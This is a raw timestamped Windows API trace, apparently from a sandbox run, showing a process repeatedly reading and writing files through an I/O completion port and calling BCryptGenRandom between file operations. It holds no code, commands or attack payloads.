1 [0160.756] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1bef7, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0160.763] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0160.805] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x17dee, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0160.806] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0160.821] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1bb02, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0160.823] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0160.836] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x18888, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0161.112] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.139] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x16d08, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.141] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.156] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1b75f, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.158] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.159] CloseHandle (hObject=0x308) returned 1 [0161.159] free (_Block=0x3df0008) [0161.159] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.175] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.176] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.176] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0161.176] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.177] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.177] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0161.177] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.177] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.177] free (_Block=0x3e305b8) [0161.177] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.177] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.178] free (_Block=0x1fa91d0) [0161.178] free (_Block=0x1fa2ed8) [0161.178] free (_Block=0x1fa90b8) [0161.178] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.178] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.180] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x177a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.181] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.207] CloseHandle (hObject=0x308) returned 1 [0161.207] free (_Block=0x3df0008) [0161.211] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.213] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x190f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0161.213] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.214] CloseHandle (hObject=0x2a4) returned 1 [0161.215] free (_Block=0x1ff1e60) [0161.215] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.224] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.225] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.225] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0161.225] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.225] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.225] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0161.226] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.226] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.226] free (_Block=0x3e305b8) [0161.226] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.226] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.226] free (_Block=0x1fa91d0) [0161.226] free (_Block=0x1fa2ed8) [0161.226] free (_Block=0x1fa90b8) [0161.226] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.227] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.229] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x17b80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.229] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.230] CloseHandle (hObject=0x2a4) returned 1 [0161.231] free (_Block=0x3df0008) [0161.231] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.255] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.255] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.256] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0161.256] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.256] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.256] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0161.256] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.256] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.256] free (_Block=0x3e305b8) [0161.256] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.257] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.257] free (_Block=0x1fa91d0) [0161.257] free (_Block=0x1fa2ed8) [0161.257] free (_Block=0x1fa90b8) [0161.257] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.257] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.259] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x14040, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.260] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.261] CloseHandle (hObject=0x2a4) returned 1 [0161.261] free (_Block=0x3df0008) [0161.261] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.272] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.272] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.273] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0161.273] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.273] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.273] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0161.273] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.273] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.273] free (_Block=0x3e305b8) [0161.274] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.274] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.274] free (_Block=0x1fa91d0) [0161.274] free (_Block=0x1fa2ed8) [0161.274] free (_Block=0x1fa90b8) [0161.274] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.274] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.276] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xd900, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.277] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.278] CloseHandle (hObject=0x2a4) returned 1 [0161.278] free (_Block=0x3df0008) [0161.278] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.287] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.287] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.287] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0161.287] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.288] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.288] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0161.288] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.288] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.288] free (_Block=0x3e305b8) [0161.288] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.288] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.289] free (_Block=0x1fa91d0) [0161.289] free (_Block=0x1fa2ed8) [0161.289] free (_Block=0x1fa90b8) [0161.289] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.289] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.291] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x11780, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.291] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.303] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x787a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.304] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.317] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xa91e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.318] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.331] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3b43, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.332] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.332] CloseHandle (hObject=0x2a4) returned 1 [0161.332] free (_Block=0x3df0008) [0161.332] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.340] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.341] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0161.341] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.341] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0161.342] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.342] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.342] free (_Block=0x3e305b8) [0161.342] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.342] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.342] free (_Block=0x1fa91d0) [0161.342] free (_Block=0x1fa2ed8) [0161.342] free (_Block=0x1fa90b8) [0161.342] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.343] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.344] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3970, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.344] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.356] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x693e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.358] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.371] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xcb0a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.372] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.385] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x6cec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.386] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.411] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x98c7, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.413] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.425] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb9bf, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.427] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.438] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x98ec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.441] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.454] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7df3, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.455] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.473] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x351c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.474] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0161.486] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, 